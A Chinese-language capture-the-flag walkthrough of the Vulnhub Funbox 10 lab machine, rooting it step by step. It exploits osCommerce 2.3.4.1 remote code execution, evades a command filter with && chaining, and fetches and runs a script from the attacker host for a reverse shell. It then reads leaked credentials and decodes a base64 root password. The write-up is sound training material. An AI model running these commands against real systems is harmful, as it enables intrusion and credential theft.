Vulnhub之Funbox 10 Under Construction靶机详细解题过程
Funbox 10
作者: jason_huawen
靶机基本信息
名称:Funbox: Under Construction (Funbox 10)
地址:https://www.vulnhub.com/entry/funbox-under-construction,715/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.63.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3a:6b:ac 1 60 PCS Systemtechnik GmbH
192.168.56.203 08:00:27:a8:e9:7d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.203
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.203 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 05:58 EST
Nmap scan report for bogon (192.168.56.203)
Host is up (0.000062s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:35:c4:90:87:20:4e:b2:59:78:19:da:da:8b:c6:ed (RSA)
| 256 55:7c:a9:99:35:1b:0e:c1:ff:5d:12:a2:1c:70:7b:84 (ECDSA)
|_ 256 20:97:69:f0:8f:e0:c9:07:ee:b0:4f:02:fb:9b:ca:0c (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: funbox10, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=funbox10
| Not valid before: 2021-06-24T17:27:09
|_Not valid after: 2031-06-22T17:27:09
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Khronos 2.0 - Slides
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP CAPA SASL UIDL AUTH-RESP-CODE PIPELINING
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities LOGIN-REFERRALS ID LITERAL+ more have OK LOGINDISABLEDA0001 post-login ENABLE listed Pre-login IDLE IMAP4rev1 SASL-IR
MAC Address: 08:00:27:A8:E9:7D (Oracle VirtualBox virtual NIC)
Service Info: Host: funbox10; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
NMAP扫描结果表明目标主机有5个开放端口:22(SSH)、25(SMTP)、80(HTTP)、110(POP3)、143(IMAP)
Get Access
首先从80端口着手信息收集和漏洞发现:
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ curl http://192.168.56.203/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.203 Port 80</address>
</body></html>
说明目标站点不存在robots.txt文件。接下来扫描一下目标站点的目录:
──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ gobuster dir --url http://192.168.56.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.203
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/21 06:03:04 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.203/images/]
/catalog (Status: 301) [Size: 318] [--> http://192.168.56.203/catalog/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.203/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.203/js/]
/server-status (Status: 403) [Size: 279]
Progress: 215470 / 220561 (97.69%)===============================================================
2022/11/21 06:03:17 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ gobuster dir --url http://192.168.56.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.203
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2022/11/21 06:03:52 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 40070]
/images (Status: 301) [Size: 317] [--> http://192.168.56.203/images/]
/catalog (Status: 301) [Size: 318] [--> http://192.168.56.203/catalog/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.203/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.203/js/]
/styles.html (Status: 200) [Size: 49211]
/readme.txt (Status: 200) [Size: 4919]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1098006 / 1102805 (99.56%)===============================================================
2022/11/21 06:04:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ dirb http://192.168.56.203
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Nov 21 06:05:03 2022
URL_BASE: http://192.168.56.203/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.203/ ----
==> DIRECTORY: http://192.168.56.203/catalog/
==> DIRECTORY: http://192.168.56.203/css/
+ http://192.168.56.203/favicon.ico (CODE:200|SIZE:15406)
==> DIRECTORY: http://192.168.56.203/images/
+ http://192.168.56.203/index.html (CODE:200|SIZE:40070)
==> DIRECTORY: http://192.168.56.203/js/
+ http://192.168.56.203/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.203/catalog/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/
==> DIRECTORY: http://192.168.56.203/catalog/download/
==> DIRECTORY: http://192.168.56.203/catalog/ext/
==> DIRECTORY: http://192.168.56.203/catalog/images/
==> DIRECTORY: http://192.168.56.203/catalog/includes/
+ http://192.168.56.203/catalog/index.php (CODE:302|SIZE:37)
==> DIRECTORY: http://192.168.56.203/catalog/install/
==> DIRECTORY: http://192.168.56.203/catalog/pub/
---- Entering directory: http://192.168.56.203/css/ ----
---- Entering directory: http://192.168.56.203/images/ ----
==> DIRECTORY: http://192.168.56.203/images/demo/
==> DIRECTORY: http://192.168.56.203/images/icons/
==> DIRECTORY: http://192.168.56.203/images/slides/
---- Entering directory: http://192.168.56.203/js/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/backups/
==> DIRECTORY: http://192.168.56.203/catalog/admin/ext/
==> DIRECTORY: http://192.168.56.203/catalog/admin/images/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/
+ http://192.168.56.203/catalog/admin/index.php (CODE:200|SIZE:37)
---- Entering directory: http://192.168.56.203/catalog/download/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/jquery/
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/
---- Entering directory: http://192.168.56.203/catalog/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/images/banners/
==> DIRECTORY: http://192.168.56.203/catalog/images/default/
==> DIRECTORY: http://192.168.56.203/catalog/images/dvd/
==> DIRECTORY: http://192.168.56.203/catalog/images/icons/
==> DIRECTORY: http://192.168.56.203/catalog/images/microsoft/
---- Entering directory: http://192.168.56.203/catalog/includes/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/classes/
==> DIRECTORY: http://192.168.56.203/catalog/includes/functions/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/
==> DIRECTORY: http://192.168.56.203/catalog/includes/local/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/
==> DIRECTORY: http://192.168.56.203/catalog/includes/work/
---- Entering directory: http://192.168.56.203/catalog/install/ ----
==> DIRECTORY: http://192.168.56.203/catalog/install/images/
==> DIRECTORY: http://192.168.56.203/catalog/install/includes/
+ http://192.168.56.203/catalog/install/index.php (CODE:200|SIZE:5405)
==> DIRECTORY: http://192.168.56.203/catalog/install/templates/
---- Entering directory: http://192.168.56.203/catalog/pub/ ----
---- Entering directory: http://192.168.56.203/images/demo/ ----
---- Entering directory: http://192.168.56.203/images/icons/ ----
---- Entering directory: http://192.168.56.203/images/slides/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/backups/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/ext/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/ext/modules/
---- Entering directory: http://192.168.56.203/catalog/admin/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/images/icons/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/classes/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/functions/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/javascript/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/local/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/modules/
---- Entering directory: http://192.168.56.203/catalog/ext/jquery/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/jquery/ui/
---- Entering directory: http://192.168.56.203/catalog/ext/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/content/
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/payment/
---- Entering directory: http://192.168.56.203/catalog/images/banners/ ----
---- Entering directory: http://192.168.56.203/catalog/images/default/ ----
---- Entering directory: http://192.168.56.203/catalog/images/dvd/ ----
---- Entering directory: http://192.168.56.203/catalog/images/icons/ ----
---- Entering directory: http://192.168.56.203/catalog/images/microsoft/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/classes/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/functions/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/
---- Entering directory: http://192.168.56.203/catalog/includes/local/ ----
+ http://192.168.56.203/catalog/includes/local/README (CODE:200|SIZE:260)
---- Entering directory: http://192.168.56.203/catalog/includes/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/pages/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/payment/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/shipping/
---- Entering directory: http://192.168.56.203/catalog/includes/work/ ----
---- Entering directory: http://192.168.56.203/catalog/install/images/ ----
---- Entering directory: http://192.168.56.203/catalog/install/includes/ ----
==> DIRECTORY: http://192.168.56.203/catalog/install/includes/functions/
---- Entering directory: http://192.168.56.203/catalog/install/templates/ ----
==> DIRECTORY: http://192.168.56.203/catalog/install/templates/pages/
---- Entering directory: http://192.168.56.203/catalog/admin/ext/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/ext/modules/payment/
---- Entering directory: http://192.168.56.203/catalog/admin/images/icons/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/classes/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/functions/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/javascript/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/local/ ----
+ http://192.168.56.203/catalog/admin/includes/local/README (CODE:200|SIZE:260)
---- Entering directory: http://192.168.56.203/catalog/admin/includes/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/modules/dashboard/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/modules/newsletters/
---- Entering directory: http://192.168.56.203/catalog/ext/jquery/ui/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/modules/content/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/content/account/
---- Entering directory: http://192.168.56.203/catalog/ext/modules/payment/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/payment/paypal/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/images/
+ http://192.168.56.203/catalog/includes/languages/english/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/
---- Entering directory: http://192.168.56.203/catalog/includes/modules/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/account/
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/login/
---- Entering directory: http://192.168.56.203/catalog/includes/modules/pages/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/payment/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/shipping/ ----
---- Entering directory: http://192.168.56.203/catalog/install/includes/functions/ ----
---- Entering directory: http://192.168.56.203/catalog/install/templates/pages/ ----
+ http://192.168.56.203/catalog/install/templates/pages/index.php (CODE:500|SIZE:70)
---- Entering directory: http://192.168.56.203/catalog/admin/ext/modules/payment/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/images/
+ http://192.168.56.203/catalog/admin/includes/languages/english/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/modules/dashboard/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/modules/newsletters/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/modules/content/account/ ----
---- Entering directory: http://192.168.56.203/catalog/ext/modules/payment/paypal/ ----
==> DIRECTORY: http://192.168.56.203/catalog/ext/modules/payment/paypal/images/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/images/buttons/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/content/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/payment/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/shipping/
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/account/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/login/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/modules/content/login/templates/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/images/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/images/buttons/
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/ ----
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/boxes/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/dashboard/
==> DIRECTORY: http://192.168.56.203/catalog/admin/includes/languages/english/modules/newsletters/
---- Entering directory: http://192.168.56.203/catalog/ext/modules/payment/paypal/images/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/images/buttons/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/content/ ----
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/content/account/
==> DIRECTORY: http://192.168.56.203/catalog/includes/languages/english/modules/content/login/
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/payment/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/shipping/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/modules/content/login/templates/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/images/buttons/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/boxes/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/dashboard/ ----
---- Entering directory: http://192.168.56.203/catalog/admin/includes/languages/english/modules/newsletters/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/content/account/ ----
---- Entering directory: http://192.168.56.203/catalog/includes/languages/english/modules/content/login/ ----
ontent/login/zt
-----------------
END_TIME: Mon Nov 21 06:06:44 2022
DOWNLOADED: 368960 - FOUND: 11
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
发现出目录/catalog/,访问该目录,返回页面,表明CMS是osCommerce, 版本号为:# 2.3.4.1,查询搜索引擎对该版本有无漏洞可利用,下面地址为漏洞利用代码的地址:
https://www.exploit-db.com/exploits/50128
将代码下载到Kali本地:
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ ls
50128.py nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ mv 50128.py exploit.py
──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ python exploit.py http://192.168.56.203/catalog/
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: RCE_SHELL$ id
RCE_SHELL$ pwd
RCE_SHELL$ ls
configure.php.bak
functions
RCE_SHELL$ cat configure.php.bak
define('HTTPS_SERVER', '://');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'funbox10');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', './');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'jack');
define('DB_SERVER_PASSWORD', 'yellow');
define('DB_DATABASE', 'c3VzYW46c2hhZG93_catalog');passthru('ls -la');/*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
RCE_SHELL$ which more
RCE_SHELL$ cd /etc
RCE_SHELL$ ls
configure.php.bak
functions
RCE_SHELL$
虽然拿到了shell, 但是似乎是功能受限的shell,但是经过多次尝试发现用&&或者;就可以规避一些过滤,可以成功执行命令:
RCE_SHELL$ ls&&id
configure.php.bak
functions
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE_SHELL$
wget命令也有,是否可以将脚本上传到目标主机
RCE_SHELL$
RCE_SHELL$ ls;which wget
configure.php.bak
functions
/usr/bin/wget
RCE_SHELL$
执行失败!
是由于写入脚本的目录权限的问题,可以在kali linux本地写一个shell 脚本,然后利用上述绕过的方法将脚本上传到/tmp目录,然后执行
RCE_SHELL$ ls&&wget http://192.168.56.137:8000/sh.sh -O /tmp/sh.sh
configure.php.bak
functions
RCE_SHELL$ ls&&cd /tmp&&ls -alh
configure.php.bak
functions
total 40K
drwxrwxrwt 9 root root 4.0K Nov 21 12:51 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .ICE-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .Test-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .X11-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .XIM-unix
drwxrwxrwt 2 root root 4.0K Nov 21 11:55 .font-unix
-rw-r--r-- 1 www-data www-data 57 Nov 21 12:50 sh.sh
drwx------ 3 root root 4.0K Nov 21 11:55 systemd-private-15479c0c3761446b84a68dbffdff1b98-dovecot.service-UUIyo3
drwx------ 3 root root 4.0K Nov 21 11:55 systemd-private-15479c0c3761446b84a68dbffdff1b98-systemd-timesyncd.service-0Jovz1
RCE_SHELL$ ls&&cd /tmp&& bash sh.sh功在Kali Linux得到shell,比较正常的shell, 哈哈
这样成功在Kali Linux得到反弹回来的shell,是比较正常的shell, 哈哈
──(kali㉿kali)-[~/Vulnhub/Funbox10]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.203] 56238
bash: cannot set terminal process group (1248): Inappropriate ioctl for device
bash: no job control in this shell
www-data@funbox10:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@funbox10:/tmp$ whoami
whoami
www-data
www-data@funbox10:/tmp$
不过没有权限进入任何普通用户的家目录,接下来将linpeas.sh脚本上传
执行脚本之后发现目标主机可以用dirty cow 2提权,但是又遇到了目标主机没有gcc编译工具,虽然linpeas.sh脚本执行结果说又gcc-5,但其实这并不是。所以这条路径暂时放弃。
搜索了一番,发现了下面的文件,其实在伪shell的时候就已经注意到了这个文件内容,并且做了尝试:
www-data@funbox10:/var/www/html/catalog/install/includes$ cat configure.php.bak
<html/catalog/install/includes$ cat configure.php.bak
<?php
define('HTTP_SERVER', 'http://funbox10/catalog');
define('HTTPS_SERVER', '://');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'funbox10');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', './');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'jack');
define('DB_SERVER_PASSWORD', 'yellow');
define('DB_DATABASE', 'c3VzYW46c2hhZG93_catalog');passthru('ls -la');/*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
发现了用户名jack和密码,切换到jack用户,
找到了这个文件,这个文件很难发现,linpeas.sh脚本没有识别出这个脚本,这也是参考其他人的解题过程:
jack@funbox10:/usr/share/doc/examples$ ls -alh
ls -alh
total 32K
drwxr-xr-x 2 root root 4.0K Jul 17 2021 .
drwxr-xr-x 544 root root 20K Jul 18 2021 ..
-rwxr-xr-x 1 root root 90 Jul 17 2021 cron.sh
jack@funbox10:/usr/share/doc/examples$ cat cron.sh
cat cron.sh
# cron.sh sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==
jack@funbox10:/usr/share/doc/examples$
解码后得到root密码
┌──(kali㉿kali)-[~]
└─$ echo "LXUgcm9vdCAtcCByZnZiZ3QhIQ==" | base64 -d
-u root -p rfvbgt!!
jack@funbox10:/usr/share/doc/examples$ su - root
su - root
Password: rfvbgt!!
root@funbox10:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@funbox10:~# cd /root
cd /root
root@funbox10:~# ls -alh
ls -alh
total 3.0M
drwx------ 2 root root 4.0K Jul 19 2021 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
-rw------- 1 root root 29 Jul 19 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw------- 1 root root 544 Jul 17 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 3.0M Aug 22 2019 pspy64
-rw-r--r-- 1 root root 1.1K Jul 17 2021 root.txt
-rw-r--r-- 1 root root 74 Jul 17 2021 .selected_editor
-rw------- 1 root root 6.5K Jul 19 2021 .viminfo
-rw-r--r-- 1 root root 229 Nov 21 11:55 .wget-hsts
root@funbox10:~# cat root.txt
cat root.txt
_____ _
| ___| _ _ __ | |__ _____ ___
| |_ | | | | '_ \| '_ \ / _ \ \/ (_)
| _|| |_| | | | | |_) | (_) > < _
|_| \__,_|_| |_|_.__/ \___/_/\_(_)
_ _ _ _ _ _ _
| | | |_ __ __| | ___ _ __ ___ ___ _ __ | |_ _ __ _ _ ___| |_(_) ___ _ __ | |
| | | | '_ \ / _` |/ _ \ '__| / __/ _ \| '_ \| __| '__| | | |/ __| __| |/ _ \| '_ \ | |
| |_| | | | | (_| | __/ | | (_| (_) | | | | |_| | | |_| | (__| |_| | (_) | | | | |_|
\___/|_| |_|\__,_|\___|_| \___\___/|_| |_|\__|_| \__,_|\___|\__|_|\___/|_| |_| (_)
You did it !!!
I look forward to see this on Twitter: @0815R2d2
root@funbox10:~#
得到了root flag!!!
(写在后面:当时在拿到伪shell后,其实已经找到了用户jack以及密码,但是此时用ssh登录该用户失败,可能是其sshd_config文件做了限制,不允许密码登录,
拿到root权限后,查看sshd_config文件也验证了这一点,而且在伪终端下不能切换用户)
root@funbox10:~# find / -name sshd_config 2>/dev/null
find / -name sshd_config 2>/dev/null
/etc/ssh/sshd_config
/usr/share/doc/openssh-client/examples/sshd_config
root@funbox10:~# cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin prohibit-password
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
AllowUsers joe susan
#AuthorizedKeysFile %h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
root@funbox10:~#